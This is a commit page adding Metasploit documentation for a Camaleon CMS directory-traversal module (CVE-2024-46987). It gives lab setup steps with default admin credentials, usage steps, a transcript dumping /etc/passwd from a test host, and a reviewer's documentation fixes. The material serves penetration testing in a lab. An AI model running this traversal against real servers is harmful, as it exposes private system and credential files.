Commit 08f6dc2

Merge pull request #21122 from bootstrapbool/camaleon_cms_cve_2024_46987
Camaleon CMS CVE 2024 46987
2 parents 92af54c + d530230 commit 08f6dc2

2 files changed

Lines changed: 455 additions & 0 deletions

Lines changed: 216 additions & 0 deletions
@@ -0,0 +1,216 @@
1+
## Vulnerable Application
2+
3+
This module attempts to read files from an authenticated directory traversal vuln in Camaleon CMS versions <= 2.8.0 and version 2.9.0.
4+
5+
CVE-2024-46987 mistakenly indicates that versions 2.8.1 and 2.8.2 are also vulnerable, however this is not the case.
6+
7+
## Setup
8+
9+
See [Camaleon CMS](https://github.com/owen2345/camaleon-cms) documentation.
10+
11+
The following describes how to setup Camaleon CMS version 2.8.0 on Ubuntu.
12+
13+
### Requirements
14+
15+
- Rails 6.1+
16+
- PostgreSQL, MySQL 5+ or SQlite
17+
- Ruby 3.0+
18+
- Imagemagick
19+
20+
### Install Ruby
21+
22+
guides.rubyonrails.org/install_ruby_on_rails.html
23+
24+
~~~bash
25+
sudo apt install build-essential rustc libssl-dev libyaml-dev zlib1g-dev libgmp-dev git curl
26+
~~~
27+
28+
### Install Mise
29+
30+
~~~bash
31+
curl https://mise.run | sh
32+
echo "eval \"\$(~/.local/bin/mise activate)\"" >> ~/.bashrc
33+
source ~/.bashrc
34+
~~~
35+
36+
### Install Ruby with Mise
37+
38+
~~~bash
39+
$ mise use -g ruby@3.0
40+
41+
$ ruby --version
42+
ruby 3.0.7p220 ...
43+
~~~
44+
45+
### Install Imagemagick
46+
47+
~~~bash
48+
sudo apt install --no-install-recommends imagemagick
49+
~~~
50+
51+
### Install Postgresql
52+
53+
~~~bash
54+
sudo apt install postgresql
55+
~~~
56+
57+
### Install Rails
58+
59+
~~~bash
60+
$ gem install rails -v 6.1
61+
~~~
62+
63+
#### concurrent-ruby Issue
64+
65+
Downgrade concurrent-ruby to 1.3.4
66+
67+
~~~bash
68+
$ gem list concurrent-ruby
69+
concurrent-ruby (1.3.6)
70+
71+
$ gem install concurrent-ruby -v 1.3.4
72+
$ gem uninstall concurrent-ruby -v 1.3.6
73+
74+
$ rails --version
75+
Rails 6.1.7.10
76+
~~~
77+
78+
### Create Rails Project
79+
80+
Run `rails new camaleon_project`
81+
82+
### Gemfile
83+
84+
In your Gemfile do the following:
85+
86+
Replace `gem 'spring'` with `gem 'spring', '4.2.1'`
87+
88+
89+
Delete this line to prevent [conflict](https://github.com/owen2345/camaleon-cms/issues/1111): `gem 'sass-rails', '>= 6'`
90+
91+
Put these lines at the bottom of your Gemfile:
92+
93+
~~~
94+
gem 'camaleon_cms', '2.8.0'
95+
gem 'concurrent-ruby', '1.3.4'
96+
~~~
97+
98+
### Install Bundle
99+
100+
From the project directory run `bundle install`
101+
102+
### Webpacker.yml Issue
103+
104+
~~~bash
105+
wget -O camaleon_project/config/webpacker.yml https://raw.githubusercontent.com/rails/webpacker/master/lib/install/config/webpacker.yml
106+
~~~
107+
108+
### Camaleon CMS Installation
109+
110+
~~~bash
111+
rails generate camaleon_cms:install
112+
rake camaleon_cms:generate_migrations
113+
rake db:migrate
114+
~~~
115+
116+
### Run Rails
117+
118+
~~~bash
119+
bundle exec rails server -b 0.0.0.0
120+
~~~
121+
122+
Navigate to `http://{ip address}:3000` and enter test under the Name field.
123+
124+
### Setup Server
125+
126+
When prompted with the new installation page just enter "test" into the Name field and continue.
127+
128+
#### Create Unprivileged User (Optional)
129+
130+
Navigate to `http://{ip address}:3000/admin` - login with the default admin credentials "admin:admin123"
131+
132+
Then navigate to "Users -> + Add User" and fill out the form.
133+
134+
## Verification Steps
135+
136+
1. Do: `use auxiliary/gather/camaleon_download_private_file`
137+
2. Do: `set RHOST [IP]`
138+
3. Do: `run`
139+
140+
## Options
141+
142+
### FILEPATH
143+
144+
The filepath of the file to read.
145+
146+
### DEPTH
147+
148+
The number of "../" appended to the filename. Default is 13
149+
150+
## Scenarios
151+
152+
```
153+
msf > use auxiliary/gather/camaleon_download_private_file
154+
msf auxiliary(gather/camaleon_download_private_file) > set rhost 10.0.0.45
155+
rhost => 10.0.0.45
156+
msf auxiliary(gather/camaleon_download_private_file) > set rport 3000
157+
rport => 3000
158+
msf auxiliary(gather/camaleon_download_private_file) > set ssl false
159+
ssl => false
160+
msf auxiliary(gather/camaleon_download_private_file) > run
161+
[*] Running module against 10.0.0.45
162+
[+] /etc/passwd stored as '/home/kali/.msf4/loot/20260411192711_default_10.0.0.45_camaleon.travers_926890.txt'
163+
164+
root:x:0:0:root:/root:/bin/bash
165+
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
166+
bin:x:2:2:bin:/bin:/usr/sbin/nologin
167+
sys:x:3:3:sys:/dev:/usr/sbin/nologin
168+
sync:x:4:65534:sync:/bin:/bin/sync
169+
games:x:5:60:games:/usr/games:/usr/sbin/nologin
170+
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
171+
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
172+
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
173+
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
174+
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
175+
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
176+
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
177+
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
178+
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
179+
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
180+
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
181+
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
182+
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
183+
systemd-timesync:x:996:996:systemd Time Synchronization:/:/usr/sbin/nologin
184+
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
185+
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
186+
syslog:x:102:102::/nonexistent:/usr/sbin/nologin
187+
systemd-resolve:x:991:991:systemd Resolver:/:/usr/sbin/nologin
188+
uuidd:x:103:103::/run/uuidd:/usr/sbin/nologin
189+
usbmux:x:104:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
190+
tss:x:105:105:TPM software stack,,,:/var/lib/tpm:/bin/false
191+
systemd-oom:x:990:990:systemd Userspace OOM Killer:/:/usr/sbin/nologin
192+
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
193+
whoopsie:x:107:109::/nonexistent:/bin/false
194+
dnsmasq:x:999:65534:dnsmasq:/var/lib/misc:/usr/sbin/nologin
195+
avahi:x:108:111:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
196+
tcpdump:x:109:112::/nonexistent:/usr/sbin/nologin
197+
sssd:x:110:113:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
198+
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
199+
cups-pk-helper:x:112:114:user for cups-pk-helper service,,,:/nonexistent:/usr/sbin/nologin
200+
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
201+
saned:x:113:116::/var/lib/saned:/usr/sbin/nologin
202+
geoclue:x:114:117::/var/lib/geoclue:/usr/sbin/nologin
203+
cups-browsed:x:115:114::/nonexistent:/usr/sbin/nologin
204+
hplip:x:116:7:HPLIP system user,,,:/run/hplip:/bin/false
205+
gnome-remote-desktop:x:988:988:GNOME Remote Desktop:/var/lib/gnome-remote-desktop:/usr/sbin/nologin
206+
polkitd:x:987:987:User for polkitd:/:/usr/sbin/nologin
207+
rtkit:x:117:119:RealtimeKit,,,:/proc:/usr/sbin/nologin
208+
colord:x:118:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
209+
gnome-initial-setup:x:119:65534::/run/gnome-initial-setup/:/bin/false
210+
gdm:x:120:121:Gnome Display Manager:/var/lib/gdm3:/bin/false
211+
nm-openvpn:x:121:122:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
212+
bittman:x:1000:1000:bittman:/home/bittman:/bin/bash
213+
postgres:x:122:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
214+
215+
[*] Auxiliary module execution completed
216+
```
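Review bot: the Options section documents only FILEPATH and DEPTH, but the Vulnerable Application section describes this as an authenticated directory traversal and the Setup section walks through creating an unprivileged user, so the credential options the module needs to log in are missing from the documentation; please list them under Options and show them being set in both the Verification Steps and the Scenarios transcript, which as written go straight from `set RHOST [IP]` to `run` with no credentials. Smaller points in the same file: the Run Rails section already tells the reader to enter "test" in the Name field and the Setup Server section then repeats it, so one of the two should go; the DEPTH description ("The number of "../" appended to the filename. Default is 13") should say what the default of 13 is relative to, i.e. which directory the traversal starts from, and end with a period; "SQlite" should be "SQLite", "Imagemagick" should be "ImageMagick", and "how to setup" should be "how to set up"; and the Scenarios block is fenced with backticks while every other code block in the file uses `~~~`, so one fence style should be used throughout.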
